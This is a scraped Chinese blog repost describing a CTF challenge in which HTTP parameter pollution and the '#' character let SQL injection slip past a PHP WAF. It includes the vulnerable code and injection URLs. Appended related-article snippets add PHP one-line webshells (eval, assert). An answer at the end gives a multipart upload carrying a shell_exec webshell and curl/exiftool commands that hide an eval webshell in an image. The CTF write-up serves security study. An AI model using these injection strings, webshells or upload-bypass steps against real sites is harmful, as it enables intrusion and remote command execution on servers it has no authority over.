【转】PHP的两个特性导致waf绕过注入

最新推荐文章于 2024-09-13 08:09:13 发布
最新推荐文章于 2024-09-13 08:09:13 发布
阅读量162 收藏
点赞数
分类专栏: PHP 文章标签: waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/q0126a/article/details/84814612
版权

1、HPP HTTP参数污染

HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:

user.php?id=111&id=222

如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。

2、一个CTF题目

http://drops.wooyun.org/tips/17248

关于注入的waf绕过,注入点为:

$sql="select * from user where id=".$_REQUEST["id"].";

可以看到了REQUEST进行传递,并且存在如下的waf代码:

functionwaf($str) {  
        if(stripos($str,"select")!==false)  
            die("Be a good person!");  
        if(stripos($str,"union")!==false)  
            die("Be a good person!");  
        ......  
    }    
      
    functionwafArr($arr) {  
        foreach($arras$k=> $v) {  
            waf($k);  
            waf($v);  
        }  
    }    
      
    wafArr($_GET);  
    wafArr($_POST);  
    wafArr($_COOKIE);  
    wafArr($_SESSION);  
      
    functionstripStr($str) {  
        if(get_magic_quotes_gpc())  
            $str= stripslashes($str);  
        returnaddslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));  
    }    
      
    $uri= explode("?",$_SERVER['REQUEST_URI']);  
    if(isset($uri[1])) {  
        $parameter= explode("&",$uri[1]);  
        foreach($parameteras$k=> $v) {  
            $v1= explode("=",$v);  
            if(isset($v1[1])) {  
                $_REQUEST[$v1[0]] = stripStr($v1[1]);  
            }  
        }  
    }    
      
    functionstripArr($arr) {  
        $new_arr= array();  
        foreach($arras$k=> $v) {  
            $new_arr[stripStr($k)] = stripStr($v);  
        }  
        return$new_arr;  
    }    
      
    $_GET=stripArr($_GET);  
    $_POST=stripArr($_POST);  
    $_COOKIE=stripArr($_COOKIE);  
    $_SESSION=stripArr($_SESSION);

    这里使用了waf函数分别对GET POST SESSION COOKIE数据进行过滤,并且对这些全局数组进行转义。

 

值得注意的是,这里的$_REQUEST是代码中重新根据$_SERVER[‘REQUEST_URI’]进行拼接,在拼接过程中将参数值进行转义操作。

(1)思路1  使用HPP特性

看似不太可能存在注入,但是使用HPP可以实现。

示例代码:

user.php?id=0 or 1&id%00=1  
user.php?id=0 or 1&%20id=1  
user.php?id=0 or 1?&id=1
    测试代码: 
<?php  
      
    function stripArr($arr) {  
        $new_arr = array();  
        foreach ($arr as $k => $v) {  
            $new_arr[stripStr($k)] = stripStr($v);  
        }  
        return $new_arr;  
    }  
      
    function stripStr($str) {  
        if (get_magic_quotes_gpc())  
            $str = stripslashes($str);  
        return addslashes(htmlspecialchars($str, ENT_QUOTES, 'UTF-8'));  
    }  
      
    $uri = explode("?",$_SERVER['REQUEST_URI']);  
    if(isset($uri[1])) {  
        $parameter = explode("&",$uri[1]);  
        foreach ($parameter as $k => $v) {  
            $v1 = explode("=",$v);  
            if (isset($v1[1])) {  
                $_REQUEST[$v1[0]] = stripStr($v1[1]);  
            }  
        }  
    }  
    var_dump($_GET) ;  
      
    var_dump($_REQUEST) ;  
      
    ?>

输出结果:

可以看到,这里的GET数组取到了最后一个值,不会触发waf,而REQUEST数据中,id则为我们的注入语句,这样

利用这两者之间的差异,我们可以绕过waf函数的检测,并且利用之前的注入点来实现注入。

(2)思路2: 利用#特性($_SERVER[‘REQUEST_URI’])

在浏览器中,是不会将#号之后的hash内容发送给服务器的,这里利用burp发包,可以将hash的内容发送至服务器,比如发送:

/#?id=1

这里GET数组为空,REQUEST则输出为/#?id=1,这样,就可以绕过waf函数对GET数组的判断,

并且在REQUEST(这里主要因为REQUEST数组是使用了REQUEST_URI进行了重组)中携带注入的语句,绕过了waf检测。


 

3、总结

这种特性导致的漏洞场景比较特殊,首先,CTF中模拟的场景是waf函数 只对GET,POST,SESSION,COOKIES全局数组进行的处理,注入点为REQUEST,在场景中,代码对REQUEST数组通 过$_SERVER[‘REQUEST_URI’],使用&分割重新组装的,这种代码处理可能是由于程序员想对REQUEST数组进行转义或者一 些净化处理才加进来的。

利用:

(1)HPP特性,提交重复参数内容,PHP处理参数时会覆盖,但是程序拼接时会出现差异,

比如提交:http://127.0.0.1/shell.php?id=0 or 1&id%00=1

GET为id=1,REQUEST为:

'id' =><small>string</small>'0%20or%201'(length=10)
  'id%00' =><small>string</small>'1'(length=1)
  可以看到,成功将注入内容引入到REQUEST数组中。

(2)利用#符号,#后面的内容不会带入至GET数组中,但是会出现在REQUEST_URI中,所以可以利用这个特性将注入语句带入到REQUEST对象中。

总之,这种特性导致的漏洞场景比较特殊,但是确实比较有趣。

http参数污染利用php特性绕过贷齐乐waf
qq_63034068的博客
08-09 712
GET/POST/REQUEST三个变量,都会经过这个正则:select\|insert\|update\|delete\|'\|/\*\|\*\|\.\./\|\./\|union\|into\|load\_file\|outfile。i_d=11111&i_d=22222 ,再获取到的$\_REQUEST i_d就是22222。可在$\_SERVER\['REQUEST\_URI'\]中,i_d和i.d却是两个完全不同的参数名,那么切割覆盖后,获取的$\_REQUEST\['i_d\]却是11111。
sql注入中各种waf绕过方式,狗,盾,神,锁,宝
Lucker_YYY的博客
10-01 1446
当我们遇到一个waf时,要确定是什么类型的?先来看看主流的这些waf,狗、盾、神、锁、宝、卫士等等。。。(在测试时不要只在官网测试,因为存在版本差异导致规则库并不一致)在配置云waf时(通常是CDN包含的waf),DNS需要解析到CDN的ip上去,在请求uri时,数据包就会先经过云waf进行检测,如果通过再将数据包流给主机。在主机上预先安装了这种防护软件,可用于扫描和保护主机(废话),和监听web端口的流量是否有恶意的,所以这种从功能上讲较为全面。
php-waf合集
12-24
压缩包内包含php版本的waf,支持过滤非法字符及文件等功能
PHP两个特性导致waf绕过注入(有趣的知识点)
Exploit的小站~
07-04 8105
1、HPP HTTP参数污染 HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如: user.php?id=111&id=222 如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。 2、一个CTF题目 http://drops.wooyun.org/tips/
利用PHP的字符串解析特性绕过Waf
qq_45521281的博客
05-01 4527
PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)换为内部关联数组$_GET或关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会换为Array([news_id] => 42)。如果一个IDS/IPS或WA...
phpwaf,简单绕过waf拿下bc网站
weixin_30709179的博客
03-11 534
确定目标收集信息x.x.x.x首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。随手加个路径,报错了,当看到这个界面我瞬间就有思路了为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的upupw --> pmd phpstudy --> phpmyadmin突破点这个集成环境包也...
phpwaf,【技术分享】php webshell分析和绕过waf技巧
weixin_42138703的博客
03-11 722
作者:阻圣预估稿费:400RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国...
贷齐乐漏洞复现+php特性绕过WAF
qq_64395221的博客
08-11 1012
GET/POST/REQUEST/COOKIE都会经过这个替换str_replace(array(‘&’, ‘"’, ‘’,‘(’,‘)’), array(‘&’, ‘"’, ‘’,‘(’,‘)’), $string),在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入$_REQUEST中,就可以造成WAF绕过了。中的最后一个参数的换为下划线然后接收,所以我们的正常代码放在第二个参数,waf失效。
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 319
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
sqlmap之waf绕过
热门推荐
qi_SJQ_的博客
11-12 1万+
白名单: 方式一:IP白奖单 从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。 测试方法:修改http的header来bypass waf x-forwarded-for x-remote-IP x-originating-IP x-remote-addr x-Real-ip   方式二:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名...
php WAF线下攻防用,模块化设计,功能可调,支持SQL AST分析
11-16
手工引用: 将Aegis.php与Aegis_lib.php放在同一目录,然后在防御目标的php文件头部加入<?php $AegisPHPName=__FILE__;include "/tmp/Aegis.php" ;?> 自动安装: 在本地的可以采用AegisManager进行本地安装或卸载,在服务端的用AegisInstaller.php与AegisUninst.php进行安装与卸载。 在防御成功显示图文的模式下,pic.jpg和music.mp3也需要与Aegis.php放在同一目录。 更多引用方式与配置方法请看注释。
Php学习之两个特性导致waf绕过注入详解
qq_32506555的博客
08-23 376
本文和大家分享的主要是php两个特性导致waf绕过注入相关内容,一起来看看吧,希望对大家学习php有所帮助。   1、HPP HTTP参数污染   HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:   user.php?id=111&id=222   如果输出$_GET数组,则id的值只
PHP一句话木马及绕waf思路
weixin_42299610的博客
03-23 2337
PHP一句话木马: 1 .eval(): <?php @eval($_POST['-7']); ?> eval函数将接受的字符串当做代码执行。 2.assert(): <?php @assert ($_POST['-7']); ?> assert函数将接受的字符串当做代码执行 。 3.preg_replace(): <?php @preg_replace("/...
php扩展 waf,基于PHP扩展的WAF实现
weixin_39622655的博客
03-18 274
访问一下看看结果:可以看到ls命令成功的执行了,也就是说我们的正常文件是不会被拦截的,而只有upload目录中的文件会被拦截,这样做又会引发另一个弊端,倘若攻击者通过某种方法将shell写入正常的文件中,或是与业务结合起来,那么这种防御手段就很难生效了。具体如何防御还要结合其他的特征进行检测,并不是没有办法了,实际应用中不能只依靠检测文件路径这一条规则,需要结合业务进行部署防御方案。另一种方法与这...
基于PHP扩展的WAF实现
swordheart的博客
04-23 2259
0x00 前言 最近上(ri)网(zhan)上(ri)多了,各种狗啊盾啊看的好心烦,好多蜜汁shell都被杀了,搞的我自己也想开发这么一个斩马刀,顺便当作毕设来做了。 未知攻,焉知防。我们先来看看shell们都是怎么躲过查杀的:加密、变形、回调、隐藏关键字……总之就是一句话,让自己变得没有特征,这样就可以躲过狗和盾的查杀。但是万变不离其宗,无论怎么变形,最终都会回到类似这样的格式: 1 2 3 <code>#!php $_GET($_P
网络攻防比赛PHP版本WAF
weixin_30932215的博客
04-14 1090
次去打HCTF决赛,用了这个自己写的WAF,web基本上没被打,被打的漏洞是文件包含漏洞,这个功能在本人这个waf里确实很是捉急,由于只是简单检测了..和php[35]{0,1},导致比赛由于文件包含漏洞web上失分了一次。不过现在不是很想去改进了。这个是比赛专用waf,商业价值几乎为0。 如果是框架写出的web就很好部署了,直接require在重写文件或者数据库文件中,如果是零散的p...
WAFPHPPHP级Web应用防护框架
gitblog_00341的博客
09-13 979
WAFPHPPHP级Web应用防护框架 WAFPHP A php framework for Web Application Firewall. 项目地址: https://gitcode.com/gh_mirrors/wa/W...
GET传值,waf过滤,php处理的整个流程
qq_62708558的博客
03-13 600
php再对变量进行解析,自动去掉空格,这时候就跳过了waf对num的监控而使得num变量get成了我们想要的值
文件上传啊
m0_63166189的博客
06-22 1266
其中’cmd‘是可以自行更改这只是其中一种一句话木马,其余详见csdn-ctf-php一句话木马集合直接将一句话木马文件上传,在使用中国蚁剑即可 显然此处只允许上传jpg、png、gif后缀文件那么就将所写的一句话木马文件后缀改为以上三种之一,如jpg,此处需搭配burpsuite,在上传的时候使用burpsuite进行抓包,注意所抓包为前端向后端请求的包, 从而更改所上传的文件后缀改为php,后续就使用蚁剑即可ps:此处因为是前端验证所以所上传文件只要通过前端验证即可首先理解何为MIME?MIME:
WAF绕过文件上传,如何绕过Nginx
最新发布
03-03
### 绕过Nginx WAF实现文件上传的技术方法 #### multipart协议特性利用 在一个基于`multipart/form-data`编码类型的HTTP POST请求里,能够一次性提交多份文档资源给服务器处理。部分Web应用防火墙(WAF),例如某些配置下的Nginx集成的安全模块,在审核此类请求时可能仅针对首个附件实施检测逻辑,而忽视后续附加的数据块。这意味着如果恶意用户将特制的有效载荷置于非首位的位置,则有可能成功规避初步筛查机制[^1]。 ```http POST /upload HTTP/1.1 Host: example.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="benign.txt" Content-Type: text/plain This is a benign file. ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="malicious.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET['cmd']); ?> ------WebKitFormBoundary7MA4YWxkTrZu0gW-- ``` 上述示例展示了通过构造包含两个文件字段(`file`)的表单数据来尝试绕开前端过滤器的情况。其中第二个文件携带了潜在危险代码片段,旨在当被不当执行时触发远程命令注入漏洞。 #### 文件扩展名与MIME类型混淆 对于那些依赖于静态分析(比如检查文件头签名或验证声明的内容类型)来进行防护措施部署的服务端组件来说,改变上传对象的实际属性也可能成为一种有效的对抗手段之一。具体操作上可以通过修改PHP脚本伪装成图像格式的方式绕过基本的身份认证流程: ```bash echo "<?php phpinfo(); ?>" > evil.jpg exiftool -Comment="<?php eval(\$_REQUEST['c']);?>" evil.jpg curl --form "image=@evil.jpg" http://target/upload ``` 这里先创建了一个看似正常的JPEG图形文件但实际上内嵌有可被执行的PHP指令;接着借助ExifTool工具向该图片添加注释标签作为隐藏通道传递额外信息;最后再经由CURL模拟浏览器行为完成整个递交动作[^2]。 需要注意的是,以上讨论均出于学术研究目的,并不鼓励任何非法入侵活动。合法合规地开展安全测试工作应当遵循相关法律法规以及获得授权许可的前提下进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值